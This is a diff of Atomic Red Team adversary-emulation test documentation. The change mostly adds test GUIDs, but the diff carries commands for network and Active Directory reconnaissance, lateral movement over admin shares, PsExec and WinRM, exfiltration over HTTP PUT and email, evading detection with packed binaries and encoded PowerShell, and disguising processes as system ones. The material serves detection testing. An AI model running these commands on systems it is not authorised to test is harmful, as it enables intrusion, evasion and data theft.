## Atomic Test #7 - Remote System Discovery - sweep + +auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de + Identify remote systems via ping sweep. Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | start_host | Subnet used for ping sweep. | string | 1| | stop_host | Subnet used for ping sweep. | string | 254| @@ -239,10 +253,12 @@ for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -e
## Atomic Test #8 - Remote System Discovery - nslookup + +auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f + Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig. Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout. - **Supported Platforms:** Windows @@ -270,17 +286,19 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.
## Atomic Test #9 - Remote System Discovery - adidnsdump + +auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959 + This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will list dns zones in the terminal. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username including domain. | string | domain\user| | acct_pass | Account password. | string | password| @@ -301,7 +319,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: ```powershell -if (python --version) {exit 0} else {exit 1} +if (python --version) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -310,7 +328,7 @@ echo "Python 3 must be installed manually" ##### Description: Computer must have pip installed ##### Check Prereq Commands: ```powershell -if (pip3 -V) {exit 0} else {exit 1} +if (pip3 -V) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -319,7 +337,7 @@ echo "PIP must be installed manually" ##### Description: adidnsdump must be installed and part of PATH ##### Check Prereq Commands: ```powershell -if (cmd /c adidnsdump -h) {exit 0} else {exit 1} +if (cmd /c adidnsdump -h) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -333,16 +351,18 @@ pip3 install adidnsdump
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects + +auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -361,7 +381,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -375,16 +395,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects + +auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -403,7 +425,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1020/T1020.md b/atomics/T1020/T1020.md index 697f4045..f7ba85be 100644 --- a/atomics/T1020/T1020.md +++ b/atomics/T1020/T1020.md @@ -12,17 +12,19 @@ When automated exfiltration is used, other exfiltration techniques likely apply
## Atomic Test #1 - IcedID Botnet HTTP PUT + +auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 + Creates a text file Tries to upload to a server via HTTP PUT method with ContentType Header Deletes a created file - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file | Exfiltration File | String | C:\temp\T1020_exfilFile.txt| | domain | Destination Domain | url | https://google.com| diff --git a/atomics/T1021.001/T1021.001.md b/atomics/T1021.001/T1021.001.md index d9bb0d80..93c50921 100644 --- a/atomics/T1021.001/T1021.001.md +++ b/atomics/T1021.001/T1021.001.md @@ -16,15 +16,17 @@ Adversaries may connect to a remote system over RDP/RDS to expand access if the
## Atomic Test #1 - RDP to DomainController -Attempt an RDP session via Remote Desktop Application to a DomainController. +auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e + +Attempt an RDP session via Remote Desktop Application to a DomainController. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("\")| | domain | domain argument default %USERDOMAIN% | String | $Env:USERDOMAIN| @@ -56,7 +58,7 @@ if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID } ##### Description: Computer must be domain joined ##### Check Prereq Commands: ```powershell -if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -70,15 +72,17 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - RDP to Server -Attempt an RDP session via Remote Desktop Application over Powershell +auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b + +Attempt an RDP session via Remote Desktop Application over Powershell **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | logonserver | ComputerName | String | WIN-DC| | username | Username | String | Administrator| diff --git a/atomics/T1021.002/T1021.002.md b/atomics/T1021.002/T1021.002.md index 001dd7b8..f772ec3d 100644 --- a/atomics/T1021.002/T1021.002.md +++ b/atomics/T1021.002/T1021.002.md @@ -20,15 +20,17 @@ Windows systems have hidden network shares that are accessible only to administr
## Atomic Test #1 - Map admin share -Connecting To Remote Shares +auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 + +Connecting To Remote Shares **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | Username | String | DOMAIN\Administrator| | share_name | Examples C$, IPC$, Admin$ | String | C$| @@ -52,15 +54,17 @@ cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}
## Atomic Test #2 - Map Admin Share PowerShell -Map Admin share utilizing PowerShell +auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 + +Map Admin share utilizing PowerShell **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Examples C$, IPC$, Admin$ | String | C$| | map_name | Mapped Drive Letter | String | g| @@ -83,15 +87,17 @@ New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{
## Atomic Test #3 - Copy and Execute File with PsExec -Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). +auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf + +Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe| | remote_host | Remote computer to receive the copy and execute the file | String | \\localhost| @@ -112,7 +118,7 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} +if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -129,16 +135,18 @@ Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
## Atomic Test #4 - Execute command writing output to local Admin Share + +auto_generated_guid: d41aaab5-bdfe-431d-a3d5-c29e9136ff46 + Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Remote computer to receive the copy and execute the file | String | output.txt| | command_to_execute | Command to execute for output. | String | hostname| diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md index 2ddef964..d197e64c 100644 --- a/atomics/T1021.003/T1021.003.md +++ b/atomics/T1021.003/T1021.003.md @@ -16,6 +16,9 @@ Through DCOM, adversaries operating in the context of an appropriately privilege
## Atomic Test #1 - PowerShell Lateral Movement using MMC20 + +auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 + Powershell lateral movement using the mmc20 application com object. Reference: @@ -23,14 +26,13 @@ Reference: https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ Upon successful execution, cmd will spawn calc.exe on a remote computer. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of Computer | string | localhost| diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md index 9dca5875..a5fb4f0d 100644 --- a/atomics/T1021.006/T1021.006.md +++ b/atomics/T1021.006/T1021.006.md @@ -16,10 +16,12 @@ WinRM is the name of both a Windows service and a protocol that allows a user to
## Atomic Test #1 - Enable Windows Remote Management + +auto_generated_guid: 9059e8de-3d7d-4954-a322-46161880b9cf + Powershell Enable WinRM Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. - **Supported Platforms:** Windows @@ -42,17 +44,19 @@ Enable-PSRemoting -Force
## Atomic Test #2 - Invoke-Command + +auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 + Execute Invoke-command on remote host. Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | host_name | Remote Windows Host Name | String | localhost| | remote_command | Command to execute on remote Host | String | ipconfig| @@ -74,15 +78,17 @@ invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
## Atomic Test #3 - WinRM Access with Evil-WinRM -An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled +auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d + +An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | Username | string | Domain\Administrator| | destination_address | Remote Host IP or Hostname | string | Target| @@ -103,7 +109,7 @@ evil-winrm -i #{destination_address} -u #{user_name} -p #{password} ##### Description: Computer must have Ruby Installed ##### Check Prereq Commands: ```powershell -if (ruby -v) {exit 0} else {exit 1} +if (ruby -v) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -114,7 +120,7 @@ Start-Process $file1 /S; ##### Description: Computer must have Evil-WinRM installed ##### Check Prereq Commands: ```powershell -if (evil-winrm -h) {exit 0} else {exit 1} +if (evil-winrm -h) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md index f7e9f706..d7874fa0 100644 --- a/atomics/T1027.001/T1027.001.md +++ b/atomics/T1027.001/T1027.001.md @@ -12,17 +12,19 @@ Binary padding effectively changes the checksum of the file and can also be used
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd + +auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a + Uses dd to add a zero to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary| @@ -45,7 +47,7 @@ rm #{file_to_pad} ##### Description: The binary must exist on disk at specified location (#{file_to_pad}) ##### Check Prereq Commands: ```bash -if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; +if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1027.002/T1027.002.md b/atomics/T1027.002/T1027.002.md index 4a353029..0bc19e12 100644 --- a/atomics/T1027.002/T1027.002.md +++ b/atomics/T1027.002/T1027.002.md @@ -18,16 +18,18 @@ Utilities used to perform software packing are called packers. Example packers a
## Atomic Test #1 - Binary simply packed by UPX (linux) + +auto_generated_guid: 11c46cd8-e471-450e-acb8-52a1216ae6a4 + Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx| @@ -52,18 +54,20 @@ rm /tmp/packed_bin
## Atomic Test #2 - Binary packed by UPX, with modified headers (linux) + +auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 + Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed| @@ -88,16 +92,18 @@ rm /tmp/packed_bin
## Atomic Test #3 - Binary simply packed by UPX + +auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 + Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx| @@ -122,18 +128,20 @@ rm /tmp/packed_bin
## Atomic Test #4 - Binary packed by UPX, with modified headers + +auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d + Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed| diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md index c5d39e0b..4b1a7bcc 100644 --- a/atomics/T1027.004/T1027.004.md +++ b/atomics/T1027.004/T1027.004.md @@ -14,16 +14,18 @@ Source code payloads may also be encrypted, encoded, and/or embedded within othe
## Atomic Test #1 - Compile After Delivery using csc.exe + +auto_generated_guid: ffcdbd6a-b0e8-487d-927a-09127fe9a206 + Compile C# code using csc.exe binary used by .NET Upon execution an exe named T1027.004.exe will be placed in the temp folder - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output compiled binary | Path | C:\Windows\Temp\T1027.004.exe| | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs| @@ -47,7 +49,7 @@ del #{output_file} >nul 2>&1 ##### Description: C# file must exist on disk at specified location (#{input_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{input_file}) {exit 0} else {exit 1} +if (Test-Path #{input_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -62,18 +64,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Dynamic C# Compile + +auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef + When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution. The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder. Upon execution, the exe will print 'T1027.004 Dynamic Compile'. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | exe program containing dynamically compiled C# code | Path | PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe| @@ -92,7 +96,7 @@ Invoke-Expression #{input_file} ##### Description: exe file must exist on disk at specified location (#{input_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{input_file}) {exit 0} else {exit 1} +if (Test-Path #{input_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 9f34ff74..152fface 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -26,10 +26,12 @@ Adversaries may also obfuscate commands executed from payloads or directly via a
## Atomic Test #1 - Decode base64 Data into Script + +auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb + Creates a base64-encoded data file and decodes it into an executable shell script Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`. - **Supported Platforms:** macOS, Linux @@ -55,17 +57,19 @@ chmod +x /tmp/art.sh
## Atomic Test #2 - Execute base64-encoded PowerShell + +auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6 + Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"| @@ -90,17 +94,19 @@ powershell.exe -EncodedCommand $EncodedCommand
## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry + +auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec + Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion| | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"| @@ -133,15 +139,17 @@ Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Na
## Atomic Test #4 - Execution from Compressed File -Mimic execution of compressed executable. When successfully executed, calculator.exe will open. +auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f + +Mimic execution of compressed executable. When successfully executed, calculator.exe will open. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip| @@ -166,7 +174,7 @@ del /Q "%temp%\T1027.zip" >nul 2>nul ##### Description: T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe ##### Check Prereq Commands: ```powershell -if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} +if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -182,16 +190,18 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102
## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email + +auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad + Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm| | sender | sender email | string | test@corp.com| @@ -215,16 +225,18 @@ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -A
## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP + +auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 + Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm| | ip_address | Destination IP address | string | 127.0.0.1| diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index db1e43f3..1e1ace1e 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Data Transfer Size Limits -Take a file/directory, split it into 5Mb chunks +auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a + +Take a file/directory, split it into 5Mb chunks **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | File name | Path | T1030_urandom| | folder_path | Path where the test creates artifacts | Path | /tmp/T1030| @@ -43,7 +45,7 @@ if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; ##### Description: The file must exist for the test to run. ##### Check Prereq Commands: ```sh -if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; +if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 60000e3a..a6b8c381 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -16,18 +16,20 @@ Utilities and commands that acquire this information include whoami
## Atomic Test #1 - System Owner/User Discovery + +auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa + Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of remote computer | string | localhost| @@ -55,10 +57,12 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
## Atomic Test #2 - System Owner/User Discovery + +auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c + Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames. - **Supported Platforms:** Linux, macOS @@ -83,8 +87,10 @@ who
## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView) -Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed. +auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca + +Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md index 53f7811f..9087162b 100644 --- a/atomics/T1036.003/T1036.003.md +++ b/atomics/T1036.003/T1036.003.md @@ -26,10 +26,12 @@
## Atomic Test #1 - Masquerading as Windows LSASS process + +auto_generated_guid: 5ba5a3d1-cf3c-4499-968a-a93155d1f717 + Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session - **Supported Platforms:** Windows @@ -57,10 +59,12 @@ del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
## Atomic Test #2 - Masquerading as Linux crond process. + +auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 + Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. Upon successful execution, sh is renamed to `crond` and executed. - **Supported Platforms:** Linux @@ -88,10 +92,12 @@ rm /tmp/crond
## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe + +auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 + Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. - **Supported Platforms:** Windows @@ -119,10 +125,12 @@ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe + +auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 + Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder - **Supported Platforms:** Windows @@ -150,10 +158,12 @@ del /Q /F %APPDATA%\svchost.exe >nul 2>&1
## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe + +auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa + Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path. - **Supported Platforms:** Windows @@ -181,17 +191,19 @@ del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
## Atomic Test #6 - Masquerading - non-windows exe running as windows exe + +auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 + Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| | inputfile | path of file to copy | path | PathToAtomicsFolder\T1036.003\bin\T1036.003.exe| @@ -217,7 +229,7 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inputfile}) {exit 0} else {exit 1} +if (Test-Path #{inputfile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -232,15 +244,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Masquerading - windows exe running as different windows exe -Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe +auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 + +Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| | inputfile | path of file to copy | path | $env:ComSpec| @@ -268,11 +282,13 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
## Atomic Test #8 - Malicious process Masquerading as LSM.exe + +auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f + Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path. - **Supported Platforms:** Windows @@ -301,17 +317,19 @@ del C:\lsm.exe >nul 2>&1
